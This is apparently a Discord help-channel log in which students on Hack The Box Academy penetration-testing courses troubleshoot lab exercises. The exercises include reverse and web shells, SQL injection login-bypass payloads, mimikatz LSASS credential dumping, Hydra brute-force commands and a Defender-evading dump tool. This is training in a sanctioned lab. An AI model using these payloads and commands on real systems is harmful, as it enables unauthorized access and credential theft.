#modules
ok im trying to reverse shell I put everything in right and the page just hangs
on the msfvenom it will give me this after 5 mins of hanging
What section
What steps did you take?
Should be to create the payload, upload said payload, run netcat with the port you specified, navigate to the page you uploaded. The page could/should hang while you have the connection open.
yes but the shell is never created
I created payload ran nc with the specified port then uploaded the payload and downloaded it
By download do you mean navigated to?
I hit download
it gives me a not found page
http://83.136.252.32:40858/uploads/reverse.php gives me the same loading
I'm confused, it's been a while for this module, why are they wanting a rev shell when it's a public address, that won't work without the student modifying their network.
Use p0wnyshell and forget netcat for the moment.
@glass quail
i was on the last part of the skill assessment and my lab timed out 
I guess the first half of that module talks about web shells
The first half of the modules shows phpbash, use something like that or p0wnyshell.
Noooooooooo
where is that
It says in the section near the top. Sorry I kept saying module instead of section
Try to exploit the upload feature to upload a web shell and get the content of /flag.txt that the objective for this section
ok thanks
will try it out
"Web Shells" at the top of the page is what you want
Evil-winrm slow af
which skill assessment are you on
smb server? doesn't work for me
so yeah it's my only way
impacket smb is a way, so is http
https://academy.hackthebox.com/achievement/667914/143 i have done it!
Active Directory (AD) is the leading enterprise domain management suite, providing identity and access management, centralized domain administration, authentication, and much more. Due to the many features and complexity of AD, it presents a large attack surface that is difficult to secure properly. To be successful as infosec professionals, we ...
took me ages LMAO because i procrastinated
It's a big module
if you can rdp that can be faster (xfreerdp has the /drive: option)
last time i touched this module was like 3 weeks ago LMAO
i saw how that big module was so i skipped everything and done that LOL
i should have had it done then
definitely don't recommend skipping over it
lots of TTPs that are pretty useful to know
i meant skipping the other modules and doing that module first
I like the labs and how all over the place you are
The phpbash worked thank you
again i also don't recommend skipping any to get to that point though i'm sure you've been chewed out plenty because a lot of the stuff was mostly already covered in other modules
i.e. file transfers/lateral movement/upgrading shells
I feel that module should be further down the list
:) i think i should rest before starting
eh it's at a decent spot in the list
i already knew those stuff but i get your point but i wasnt in alot of struggle
I started that one too lol
most of the stuff required at least for the second assessment was 100% covered by the module
i'd say the other 10% was remembering how certain commands worked 
good job i just started ad attack and enum yesterday myself haha
it be like that LOL
in reality i probably spent maybe like 3-4 days actually working on it
that is pretty much how long i spent
the thing is i was doing all of that module at my work LMAO
of that maybe half that time was just waiting on enum tools to finish
I accidentally did the first lab blind and was sad when I completed it so quickly.
i think that's a healthy way to do it imho ¯_(ツ)_/¯
tyrna be like you LMAO
just push forward then worry about the questions after
I was having too much fun
the skill gap is insane from me to u T-T lol
wasn't like a lot of people's complaints about the whole admin thing for the one user or was that a different module entirely
¯_(ツ)_/¯
still painfully slow
Might be your connection ig. If you ping it what's your avg rtt? (ping -c 5) should give a rough estimate
TCP or UDP for the VPN? Assuming bad Internet means you're on tcp and that means poopoo transfers
300ms
At least it's stable
or I might try to dump lsass remotely
So we can rule out littering being the issue
Whatever goats your boat
But in all honesty gl :)
or upload mimikatz
dumping lsass remotely is better
also there's a tool by areous I think it does a good job
@next bronze tool do be goated
Investigating the strange behaviour of Windows Defender that led to a fix, enabling MultiDump to perform LSASS dumps without subsequent detections. With code snippets on locating and resuming suspended threads.
which event ID was it? I'm still stuck
never mind guys
👍
been stuck at this 1 question for 1 hour:) htb really needs to improve their RDP
anyone has completed the "intro to whitebox pentesting" skill assessment? i am kind of stuck and hope for some help
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
yoo no spoils
Need some help with the first bash script, please
Attack Common services, SA-easy lab usually get connection time out issue, please check it
I guess those were just potential CLSIDs, I tried running the test_clsid.bat script to narrow down the choices and went from there to get the right fit, hint: 85C}
anyone i can dm for blind Server-Side JavaScript Injection in the nosql module?
i have a script that is working, but it breaks at a certain chr limit
essentially i just dont know if i have all the characters that are expected to be used
rn im using
",$_-#{!}'"+"1234567890"+"abcdefghijklmnopqrstuvwxyz"+"abcdefghijklmnopqrstuvwxyz".upper()
turned out the character ' ruined the payload
This question in Active Directory Enumeration and Attacks...
I think I have done everything, from net commands to dsquery and more, some text editing here and there and nothing found. Can anyone provide a hint or something?
Im currently doing the Skills assesment for Window Event Logs and im stuck on q1
isnt the answer ||mmc.exe||? I used this XML query
<QueryList>
<Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
<Select Path="Microsoft-Windows-Sysmon/Operational">
*[System[(EventID=7)]]
and
*[EventData[Data[@Name='SignatureStatus']='Unavailable']]
</Select>
</Query>
</QueryList>
do you include the /domain option?
mhm local i see
Yes I did. I tried things like net group "Local Admins" /domain and net users \domain and tried dsquery to go LDAP
should be fine to just do net group "Administrators" then
There is no such group
then administrator
i dont think its the group "Local Admins" you want
should find administrators
do not include the /domain option
Yes I tried that 😂 It does not exist either I think.
Wait why?
because its local
net localgroup administrators
Oh I see...
I got it
Wow seriously? 😂
The wording of the question is really weird then, given it says what domain user
Thank you for the help @placid edge ❤️
That's it, it said which 'domain user' is part of the Local Administrators group. I thought I should be enumerating the whole domain and searching for someone in the local admins
The wording is fine, the understanding was wrong 😄
Alright my bad 😂
ok i got my local testing payload! now will need some modification to get the target's flag..
greetings, I'm solving the usage room, i did sql attack, I got the database, I found the password and the user name, but when I log in, I get two errors, either a password error or an expiration date
hey i am stuck on module "Attacking Common Services" section DNS Attacks. I am running subbrute but it doesn't give me any results
figured out the issue, had to open via saved logs instead of double clicking evtx 💀
Answering to myself: coercion is needed, which can be obtained with printerbug.py for example.
if there are people who are stuck with intro to whitebox pentesting skill assessment 1 can dm me... 😄
verify your account in #welcome to access #1228763236409802814
Use the ip of the target
oh thanks @soft cedar helped me
idk why but the problem was to use ./ instead of python3\
I used
admin' or '1'='1'-- -
for an SQL injection, but
admin' or '1'='1
did not work
What would be the reason for that?!
It's pretty much the same payload!
It's pretty much not the same payload. The first one is commenting out the rest of the query, so if there was a password requirement you effectively deleted it.
I thought the second one would work since the quote is left off at the end to close that portion.
But the rest of the query is still there so you will need a matching password
I didn't see the
admin' or '1'='1'-- -
example in any part of the module, so I was confused. I found it in a walkthrough of some box.
Yeah that makes sense now. I guess the module can only teach so much, a lot of this is trial and error since it's blind.
to visualize against the original query how the other two work
original query
user='admin' and password='admin'
admin' or '1'='1'-- -
user='admin' or '1'='1'
admin' or '1'='1
user='admin' or '1'='1' and password='admin'
that comment makes a big difference
Module: HTTPs/TLS Attacks - Skill Assessment
I was able to decrypt/encrypt the cookie and get the admin token validated, but it says to check the email for information.
Can someone provide any tips on how to get the flag?
@fringe urchin thanks dude.
But the thing is I can't complete my identification. It errors out. I tried regenerating my account ID and still same error.
Is there a specific channel where I should contact or ping any online mod?
Hello guys I need help on this module problem...
You can send me a DM
Search for "wordpress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.
I used burpsuite and sent a POST method on the website. But idk what i'm looking at and how many method calls are there.
The response from the POST method
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml; charset=UTF-8
Connection: close
Date: Wed, 17 Apr 2024 14:16:20 +0000
Content-Length: 403
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault>
<value>
<struct>
<member>
<name>faultCode</name>
<value><int>-32700</int></value>
</member>
<member>
<name>faultString</name>
<value><string>parse error. not well formed</string></value>
</member>
</struct>
</value>
</fault>
</methodResponse>
I need help. Im trying to connect ssh but it keeps saying password denied what am I doing wrong
ssh htb-student@???
the ip they give you is what u put after the @
Does anyone know which module in htb platform I can practice with burp suite?
anyone know how to troubleshoot pwnbox stuck on starting? ive tried changing the location
nvm i just had to retry a bunch
anyone got gold/silver annual? I want to ask something
Hey, Im really interested in the path Senior Web Penetration Tester, but it is very expensive. Is there any student discount available?
nope it didn't have...
too bad, I really like that path, but the price is prohibitive for me
yes the price is a little bit expensive... but if you really love web app pentest, you could check out other platform too
What do you recommend? Burp stuff?
I'd do portswigger academy if you're looking for free labs for web stuff
SecureFlag, PortSwigger, PentesterLab, bug bounty hunter, hackerone CTF....
there are a lot of options and I think the hardest/ annoying part of web app pentest is to collect payloads/ methods...
Hello, Im doing the Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux. Question 1 and im running this command `GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley`
whats up
when did the voucher expiry?
think its 1 year
anyone?
Hello can you help me please, if I want to dump lsass, what must I do?
mimikatz with options :
privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords (incorrect) it is not okay
so I use lsadump::lsa
but I don't find my answer and normally she is on the lsass.dmp
Is there another channel that's used for course support for academy modules? I assumed that was here but I'm not sure if there's somewhere else where these questions should be asked/answered instead
you are at the right channel
which module are u doing
Was doing the linux priv escalation - abusing sudo. I checked some writeups and looks like the module has changed and seems as though I have to exploit openssl to execute a command now. But the only way I found to do it was to write a custom c++ code to be an openssl engine to do which is kind of a pain when I haven't written anything in c++ for years. Does not seem like an 'easy' module to me to have to relearn a whole language to do a small piece of it. Is there any easier way to do some type of command injection to openssl other than an engine?
here
check out gtfobins
theres a section in there about openssl that u can use to priv esc
im pretty sure u doing openssl with sudo correct?
Yeah that looks exactly like what I needed. Been on there before but had forgotten the link. Thanks!!
anyone can help me with Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop. (Windows Privilege Escalation Skills Assessment - Part 1 - module)
Hello, Im doing the Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux. Question 1 and im running this command `GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley`
sorry bro i forgot about what i did maybe its not lsass u should be looking for
have u tried to see if u can get the SAM @dreamy solar
you might want to re-evaluate this one...
can someone give me a hint to get me started for the medium lab on footprinting?
finally I find I don't know why it is not okay before reboot machine
I'm having a hard time getting my brain into gear and I've been thinking for days and I know I should use nmap
but I am having trouble figuring out what to scan for? without giving too much away could I get a hint to get my brain started in the right direction?
enumeration
ya I know but just any and all enumeration?
like is there something I can look up on google to get me in the right direction?
you said to get started ¯_(ツ)_/¯
ok thanks
have you tried anything?
ADCS Course, PKINIT Module
Any idea as to why I'm getting the KDC_ERR_C_PRINCIPAL_UNKNOWN error when using the same syntax as the course? It should be pointing to the new computer account we just created with passthecert.py, no?
I will get back to you in 30 minutes after I try some stuff. I tried Nmap yesterday I searched for RDP vulnerabilities and SMB vulnerabilities and maybe DNS and didn't find much.
I found that ports are open
but don't have password to login
found domain name etc but couldn't find username
hello anyone faced the same issues when runing dirsearch
which is needed to get password
i'm stuck here during 3 days
review all the open ports, your knowledge should not need to expand past the sections for this lab
yes
so what does cause machines to die with like an hour left
i tried Invoke-WebRequest to upload juicyPotato.exe, but doesn't work
evilwinrm?
to upload
hmmm
i sent dm to you
Hi module Enumeration with nmap. Hard Lab. I am being asked to find the version of one of the running services on the target? The flag should be in one of the version strings correct?
Well its gonna be shown as a flag HTB{}
ok well i found some services and enumerated their version. no flag. Therefore i have not found the right service i guess
The flag will be shown once you connect to it via nc but yea most likely you havent found the correct service yet
Hi guys, I wanna do an attack in Active Directory Compromise from AEN. I cracked the guys password and went to the next stage but I'm getting an error that the ad cmdlets aren't installed. Don't know how to redact so sorry for being vague 😄
Help meeee
Yes any and all enumeration is a good idea for any lab
hmmm
nmap -Pn -n --source-port 53 -oA <filename>
should that just scan the top 1000 ports?
Nmap scans like top 1k by default. But you would need to scan all in this exercise
what i found strange is that the above
found me a very high port
like above 40k
and that's strange to me because i thought it's only the top 1k
Its top 1k most common ones and not 1-1000
Pretty sure there is no need to scan udp. Takes a loong ass time to scan em
Its a pretty high tcp port
Whats the last 2 numbers of it?
00
😄
I realized what i asked after i sent
I didnt enjoy the module at all. But hey, maybe some others did. Footprinting was muuuuuch better imo
i've started dipping into footprinting but being stubborn and trying to finish the hard lab
it's not that the content isn't good
it's just that it's hard to test the knowledge with the flags
Meh yea its more like trial and error and be patient with the scans.
Meanwhile footprinting covers a lot and the easy, medium and hard labs cover almost everything if not everything learned
The medium one was really great and enjoyed the hard one as well
You sure you arent being blocked by the firewall?
yeah i'm using source=port
i noticed that firewall drops unless using sourceport in the nmap scans
Yea but if you hit the limit you still are being blocked regardless if you source it
still within limit
Whats your command
sudo nmap -sV -p <port num> 50000 <ip> --source-port <port>
this gives me open port and attempts to give me a service version
i note that i do need the source port set
for nc i use
Yea you tried to connect to it via nc?
nc -p <src port> <ip> <dest port>
Hmmm
hmmm just reading about tcpwrappers
I mean your command looks mostly the same as mine
I used -nv which is for disabling dns res and v is for verbose
i think what's happening is the fw is completing the tcp handshake which is the behaviour of tcpwrapper if u are not in the list of hosts that is allowed to access the service behind the port
no timeout
Try again and wait a few seconds
I remember i waited like 10-20 sec before it got established

Is there a way to add a user to a group without ActiveDirectory cmdlets?
net user /domain if you have privs?
I suffered for a long time there but found a way with ADSI and managed to get the hashes.
this makes 0 sense Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words)
i fucking did 6 times
Thanks for this 
It'll come in handy to do it all over again tomorrow 
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words) the only 3 word plugin isn't right. and there's no version did a former offsec content dev write this question?
Could I dm someone who passed HTTP Attacks Skills Assessment, I ran out of ideas after trying for 8 days. Seems that I got the TE.CL via te.te and crafted the payload to passthru WAF, but email is not triggering.
I'm working on:
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
And I'm using:
hydra -l sam -P ./mut_password1.list ftp://10.129.24.92 -t 64 -vvv
all children were disabled due too many connection errors
I scanned the instance and it's showing FTP is open.
Well, FTP is definitely working:
ftp ftp://sam@10.129.24.92
Connected to 10.129.24.92.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
Can you provide the module and section?
nvm - It seems as you're attacking the wrong service... furthermore, if you search for this particular question in discord, there are suggestions to remove quite a few (first ~17k) of the passwords from the list.
Password Attacks - Password Mutations
Thanks for the help. I have no idea what I'm doing wrong and am ready to move on from this section. 😐
In Windows File Uploads, why does HTB say there's no powershell upload functionality so we have to use the PSUpload.ps1 script, but then at the bottom for FTP uploads they use a powershell upload function
Not 100% on this one, but I guess the upload function comes from the script? So to say: There is no inherent upload function, but you may import it with the script.
I don't think that's it because this is what they used to perform uploads from the powershell script
But the first picture I posted uses Net.WebClient.UploadFile which I think is different
Ah I see.
So should I table my issue for now?
Depends on if you're able to figure it out?
Thanks for the help.
You're a very generous and wise person.
No please, don't strain yourself.
Go help someone else.
I think it's just an issue of wording - -meaning: There is no real built-in functionality, but you may "abuse" the Invoke-WebRequest or Invoke-RestMethod to be able to upload stuff.
This reminds me of OffSec.
?
Did you get laid off by them?
I just cant help but think that isn't it because this isn't Invoke-WebRequest or Invoke-RestMethod
maybe it is and im wrong but i just see the conflict
yea this is different https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.uploadfile?view=net-8.0 from https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4
The Invoke-WebRequest cmdlet sends HTTP and HTTPS requests to a web page or web service. It parses the response and returns collections of links, images, and other significant HTML elements. This cmdlet was introduced in PowerShell 3.0. Beginning in PowerShell 7.0, Invoke-WebRequest supports proxy configuration defined by environment variables. ...
Fair enough - it could be an error... in the end: You just need to know how to upload stuff. 😅
If someone could reach out to me to provide assistance, I'd appreciate it.
i would help but im not in that section yet, sorry 😪
I literally told you that you're attacking the wrong service and that you need to remove a lot of passwords because it's slow. What do you need more? Should I login with your credentials and solve it? Like wtf.
Do you work for HTB?
Do you see any indicators for that?
And no, attacking SSH doesn't work either.
Don't talk to me then bud.
Dude, I've solved this challenge without a problem and am just trying to help. 😂
DM me if you want to continue.
Yeah, go figure.
Yeah, putting on a show. Sad.
No need for that.
[ERROR] ssh protocol error
Reset the machine and try again.
I have, 3 times.
Fun. What does nmap say?
Port 21 and port 22 are open.
Checked versions on both ports, those also come back open.
Sorry then, as per my notes you're not doing anything wrong. 
Forums is always a nice place to go. https://forum.hackthebox.com/t/password-attacks-password-mutations-academy/265287 This helped me with the module.
Hey I have been struggling with this section for hours. I got a mutated password list around 94K words. Separated the list into ten smaller lists. Then I did: hydra -l sam -P [name of the smaller list] ftp://[target IP] -t 64 wasn’t able to find a valid password for user sam. Any help would be appreciated xD
I tried all of this and unfortunately nothing is working.
I can attempt to login to both though.
It's very strange.
What exactly are you struggling with on this module
I'm working on:
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
And I'm using:
hydra -l sam -P ./mut_password1.list ftp://10.129.24.92 -t 64 -vvv
all children were disabled due too many connection errors
How did you mutate your password list
you tried the 48 threads instead of the 64?
Yes.
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
Okie I would suggest doing more to see if you can tailor a little more
The tools are not connecting to either service.
Can you ping the machine ip?
Yes, and I have verified they're up and open via nmap.
What are the errors you are getting?
[VERBOSE] Disabled child 36 because of too many errors
[ERROR] could not connect to target port 22: Timeout connecting to 10.129.24.92
is the privesc 'test your skills' end lab supposed to be so laggy on ||/blog|| as well as giving me the wrong IP addresses? not sure if its technical issue or im meant to intercept the links and put the correct IP in.. afaik theres no lateral movement
Are you specifically attempting to bruteforce SSH?
I've attempted to brute force both as the info I found online lead me to believe that I should be targeting FTP instead of SSH.
You're right on the money there. Going back and re-attempting now for a sanity check for you.
I mean you can do either but SSH just takes longer also hydra should give you a warning telling you you have too many threads going for SSH that's probably what's happening with that error msg
But yeah I would take a look at your mutated password list it needs to be curated a bit more
I took it down to 1 thread and it works.
Also we all struggle with stuff when we're learning I know I do so just don't give up keep working at it and take a break if you're getting too frustrated and most importantly don't feel bad
There's nothing to work at, it won't connect even with 4 threads...same errors.
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[ERROR] could not connect to target port 22: Timeout connecting to 10.129.202.64
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete
I'm submitting a ticket. Thanks anyway.
Go slam ftp again. This one takes a bit if I'm remembering correctly. Adrestia is right though, if you can cut down the list it will become significantly less painful. This was one of my least favorite modules, but there is one post in the forum that gives you a significant hint in cutting down the list. It will most likely still take long, but at least you won't be waiting forever. I'd say pop hydra and let it run while you kill an episode of the new fallout series. lol Try 32 threads too. That's what I'm running at with no issues so far, but that might just be my machine.
I completed the sanity check and I was able to pop it after about 12 minutes with a post from the forums
Oh I did cut the password list...
I'm only using the end of the Bs and up.
The problem is (again) that it's not connecting.
And now I moved on to another module a couple sections forward and the IP won't ping.
My mistake. Can you do me a favor, try -t 32 against with your shortened list? Let me know if you get an error?
Can you do it against ftp again? Maybe try -t 24? And are you using the pwnbox or a personal machine?
Let me know if that throws an error.
Did you try against ftp with the threads at 24, and it threw an error?
48 threads works fine. why did you "cut the password list to the end of Bs"?
I was looking at forum posts and that was one of the suggestions that was made.
yeah i wouldn't listen to that post
Well, again...it's not even connecting so I don't see what the list matters at this point.
Regardless of the list I use the problem remains.
What is the error you are getting when attacking ftp?
Same as SSH.
hammering it with 64 threads causes it to die i think. restart the box, use 48 threads
maybe see if there's some verbosity or debug option with the tool you're using then. i didn't have an issue with the tools in that module.
i was on kali though
I could connect and was prompted for a password for SSH and FTP.
u just unable to find the pass to brute force?
he said his tools aren't connecting to the target
ah can i see the command u are running?
anyone can help me with Windows Privilege Escalation Skills Assessment - Part I in this question Find the password for the ldapadmin account somewhere on the system.
i tried ||where /r C:\ password.xml password.ini password.txt password.config|| but doesn't work
Feel free to DM me
hydra -l sam -P ./mut_password1.list ftp://10.129.24.92 -t 4 -vvv
which module is it?
make sure your wordlist has 94k lines, then just filter by those starting with B grep -E '^B' and try with the new list
The next section is just as much of a pain.
Could try restarting your vpn connection. Sometimes I have to restart mine after a few hours when I'm having connection issues to the service.
I'm dumping this module until I have money to pay for a tutor. This is garbage.
I've gone through the entire CBBH and up until now I've never had problems like this.
did it work on the pwnbox?
If anyone knows how to complete this module and wants to get paid, DM me.
i will help you for free, but everything you've described here makes it sounds like it's a problem with your computer or the tools you're running. if you can connect to the services with regular ftp/ssh commands then the box is up. i would start by trying it on the pwnbox like you mentioned earlier to help narrow down the issue.
I don't think you understand, I don't like this OffSec style education.
I'm happy to screenshare and prove that I'm not the problem, this module is.
I've gone through the CBBH and completed it already, and completed the CPTS up until this module and it's trash
the problem is i can provide screen shots of it working fine
many people have also completed it without issue
as i said everything you've said to this point indicates it's a problem on your box's end
Have them DM me.
plenty of people have done it, try a new vpn, make sure you have a stable connection
^
I'm not gonna dm you but I have done it
Did that.
what were the results from the pwnbox you said you were going to try?
did the pwnbox work?
Honestly bro I moved on to the next section and the connection to Remmina keeps dropping.
And I had connectivity problems a couple days ago also.
My time is worth more to me than this and I just want to get this done.
their servers are in another continent for me and I did the whole cpts path and many other modules without much issues 
I'm not gonna argue with you, you're free to skip if you want
<@&861185840277487616>
paying to solve modules, yeah okay
Baseless accusation.
this is funny as fuck
I'll give you the benefit of the doubt this time. Please don't use Discord to supposedly offer paid services. You only get 1 warning.
Where did I offer MY services?
yeah dont do that either. plenty people will help for free. What are you struggling with?
Give me the means to identify you to HTB please.
what?

why don't you pay an actual tutor or pentester etc
I just offered to bud.
Who is threatening you?
You can click on his name and see his badges, he's also in the discord admin list in the people list.
That's enough to ID him with HTB?
I can reference this screen name?
Accusing me of breaking rules or whatever is seriously hilarious. Look at the chat.
Reference me for what? HTB knows who I am lol
Good.
We volunteer for them. We talk with some staff members regularly. Yes, they know who we are.
I've been trying to get help with this for a while.
Uriel bro just take a step back man. not worth all this.
Hi @valid viper, if you have some constructive criticism about the modules / CBBH I suggest you leave some feedback here: https://help.hackthebox.com/en/articles/5987511-contacting-academy-support
Need some help? Learn how to reach the support team on Academy.
I've been respectful this whole time.
Okay, help with what?
I even offered to pay for help. Then I get accused of breaking rules?
I misunderstood the situation. Relax.
Clearly I'm just trying to get help.
Okay. Again, help with what?
Tier 0 modules are open for discussion, anything else not so much.
I'm relaxed bro. I just don't like it when people are mean to me when I'm just trying to learn.
Password Attacks --> Password Mutations
Who is mean to you? I told you i misunderstood the situation.
David was pretty rude earlier.
Dunno who that is, but next time, if someone is being a jerk, you can ping a moderator.
[VERBOSE] Disabled child 36 because of too many errors
[ERROR] could not connect to target port 22: Timeout connecting to 10.129.24.92
The error is self explanatory
And yet... I can ping the IP, and verify the ports are open via nmap.
And when I attempt to login to FTP/SSH I can get to the login prompt(s).
What tool are you using?
hydra.
Try reinstalling it
Try another tool
Just as an FYI, this is the same advice you would get if you paid someone.
And I'd tell that person that hydra worked fine a couple days ago.
And that john doesn't work either.
And that when I tried the very next section...I was unable to access the box via RDP.
Neither remmina nor xfreerdp work on that one.
Box prob shutdown. The labs run for limited time.
You're a funny guy.
Find someone else to help you then.
I put my dinner down to try to help you. How about you learn proper manners.
East coast.
I would like to point out that subscription users do get tutoring. That might be up your alley since free help is insufficient for you.
Then use the proper channels for that. I'm not a subscription user so im not sure what that looks like
IDK what else to tell you.
Nothing bro, all good.
I've learned my lesson. I sure won't be coming back here when I move on to the CWEE.
In the future, might be worth considering your tone. I understand the frustration you are having, however, being aggressive with someone who is not obliged to help you (for free at that) isn't the way to go.
No thanks hon.
You want to hear my tone?
lol
I can invite you to my server and we can hop on voice.
No thanks
No I'd imagine not.
You really should chill though.
Why?
I haven't done anything, at all.
I've provided respectful feedback to HTB while also complimenting them.
I haven't called names or anything juvenile like that.
I mean seriously, you're being sensitive on this and ought to hear my uh, tone to put you at ease.
Missouri?
Just from my interaction, I tried to help troubleshoot. Not sure how HTB is at fault b/c it sounds like your tool is broken or the machine died.
I tried John and Hydra.
What about Missouri?
And again, on the next section it wouldn't let me into the remote desktop.
What are you on about?
Nothing mane.
Good bruh
Did you get the Packet Squirrel v2?
I'm off now, this channel is for discussing modules.
Adios frate.
I got the username of the server and the folder from NFS for the medium footprinting lab. I am looking at remote access protocols with Windows. Am I looking in the right place or is RDP or WinRM, etc. a bad place to look?
where should I be looking?
One sec I'll look.
Definitely NFS.
ok thanks
I did
DM me.
ok
i gotta finish the pivoting module already
go learn ligolo
that's the plan.. i just have do the assessment
I did it twice one with ligolo and one without it
yeah i was thinking of doing it without first then learning ligolo to see the difference
Huge difference, but the other methods have their uses too
Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket
Looks interesting. Well, if nothing else I'm glad I learned this today.
It makes pivoting easy, I didn't like chisel, MS just does weird things at times, proxychains is well proxychains...
whats your gripe with metasploit gubarz
So many times I'll setup a route and either it kills the connection or the endpoint drops and then I'm just wasting time troubleshooting ms instead of having fun
hi I have the contents of important.txt file in the windows rdp so now I need to use that information to get to the next step. I need to log in as admin?
Are you asking or did you try?
hold on trying right now
Chisel is a nightmare when it comes to double pivot
Specially if you want rev shell
hi I got into RDP login and now I have contents of important.txt, as said above and I'm trying to login as DBA. Its saying connection was successful but its saying it cannot connect due to an error. Am I missing something here?
can someone help me out here?
What’s the error
TITLE: Connect to Server
Cannot connect to WINMEDIUM.
ADDITIONAL INFORMATION:
A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (Microsoft SQL Server, Error: 233)
For help, click: https://docs.microsoft.com/sql/relational-databases/errors-events/mssqlserver-233-database-engine-error
No process is on the other end of the pipe
BUTTONS:
OK
The connection was successfully established but then an error occurred during the login process
Using Windows auth?
this is in Microsoft SQL Studio Server
the above screenshot is my reply to that comment
Can you not attempt to login, just errors as soon as you open it?
if I click connect it spits out the error
Pivoting > RDP and socks tunneling with socks over RDP. Downloaded socks over RDP plugin.DLL and I cannot regsvr32 socks over rdp .dll, it refuses to load but the entry point was not found. In loading this after I unzipped it and it just won’t work
Can anyone help me I’ve been stuck for days on end
You can fumble through the services and restart the mssql related ones or restart the box
ok so I'm doing it right tho?
It should just give you an auth failed message if you're doing it wrong
ok thanks
Any error messages?
The module socks over RDP plug-in dot DLL was loaded but the entry point DLL register server was not found
May I ping you
No, did you disable defender?
I’m on a work computer so laugh at my pic
I just restarted the target box. it is still giving me the same error
I didn’t know to do that
But it’s off from what I see
This makes no sense I’m doing what the lab told me something is missing or misleading by omission
I don't have my notes for that section
I started target box and it didn't work
:/ using local auth or Windows auth? And you have the server selected in the drop down ?
Is Windows auth the one where I'm already logged into Windows I'm just trying to log into the SQL server from Microsoft SQL Server Studio?
I open Microsoft SQL Server Studio and then try to connect
once RDPd into Windows
If anyone can help please let me know this lab doesn’t make sense per the directions and is misleading in some obscure way that’s not being taught
gubarz pretty much gave you the answer already. there are protections running preventing the dll from loading.
Defender is off
I looked at customized settings and it’s all “turn off windows defender firewall”
windows defender != windows defender firewall
This random screen shot, should say Windows auth
show a screenshot that shows your command along with real time being off
windows auth also gives error
looks right to me, should work with it disabled.
are u running it with admin rights?
maybe delete it and re-upload it and try again with the anti virus off and with admin privs
Ha, better error, that user cant login, delete your screenshot
Works
For all those stuck on this. Make sure you turn off real time virus ( then download file) a HUGE point not even shown in the lab
That’s a load of crap to not even mention it
Hmm?
Tejas as in Texas amigo.
Like Califas.
I tried it on pwnbox, same thing happened.
Way cool 🙂
Now it's giving me errors XD
On FOUR threads.
I already reached out to them.
I've tried this on bare metal Parrot, a Kali VM, and pwnbox.
XD
Password Attacks / Password Mutation
I mutated the password list in that module.
Then I used the list with the user sam to bruteforce the box's SSH with 4 threads via Hydra.
Whats the error hydra's giving you?
1 target was disabled because of too many errors.
try adding -t 4 to the hydra command
Indeed, yes.
About only idea i got tbh, Support can help more though.
Yeah we'll see.
I honestly hate brute-forcing in the first place.
I don't see the point.
Hi, i need help on Introduction to Whitebox Pentesting skill assessment 2 which requires patching of code
And for this very reason...lol Even HTB's box is saying 'Whoa, too many requests. Shutting down.'
I completed it thanks
Delete your screenshot
ok
Hi i need a nudge on skill assessment 2 on Introduction to whitebox pentesting 😄
ouuu spanish speaker
Little bit.
I'm doing the module file upload attacks and im on the white list filters sections is there way to automate the process of checking extension will execute
Absolutely, I used zap for that, but can easily be done with burp or even ffuf
is it fuzzing in zap? im using that cause its faster than burp and I just know how to fuzz the extension and look for the successful updown
upload
Yes, keep an eye on return sizes/codes/header sizes
ya I know that part I been going through all of them that say 26 bytes sending them to the repeater then checking the url
the module shows you exactly how to do it in the previous section, under blacklist filters "fuzzing extensions"
oh ya I know how to do it im just trying to figure how to automate the process so I can check a bunch a once
intruder automates it.. the section shows you how
it goes over loading the wordlist and everything
it checks to see if the url is executable? I thought it just checked if it was successfully uploaded
You can also setup zap/ffuf to go through burp proxy if that's where you like going to get your output and don't feel like waiting
oh sorry i misunderstood. i don't think it auto-attempts the exploit for you. it might be able to but i don't know burp well enough. if it doesn't you can create extensions yourself with python.
me too
its okay ya I have 106 urls to check hehe
Just remember if you're ever doing this in the real world to limit the number of threads and space out time between requests.
Some people get touchy 😛
Ppppfffft, actionable find not my fault they can't handle my awesomeness
```
[ERROR] ssh protocol error
[ERROR] all children were disabled due too many connection errors
```
thank you ya it would be fun to know enough to challenge myself to evasion of certain defense tool like that
You don't need to check them all. There are only a handful of php files that actually execute code, and the upload filter is blocking a bunch of stuff. It sounds to me like you did something wrong, because you shouldn't be able to upload every single payload.
Damn man. Any better luck on another port?
you can simply sort by response size to see which ones made it through
FTP does something similar.
I'm honestly just checking it one more time for kicks.
TCP or UDP for the VPN?
Eh that should rule out VPN/Internet
here's what im looking at i don't know what I did wrong
Give ftp and TCP with a low thread count
Is 4 low enough?
Should be
Please tell me this isn't on the test...
If it goes long enough w/o error you could kick it up to 36 or 48 to speed up the process
Yeah I use ZAP but not super familiar. I can guide you to do it in Burp, but the example itself shows that phtml gets rejected in uploading so you're not doing something right, maybe you're encoding the period or something in the extensions.
user-agent...?
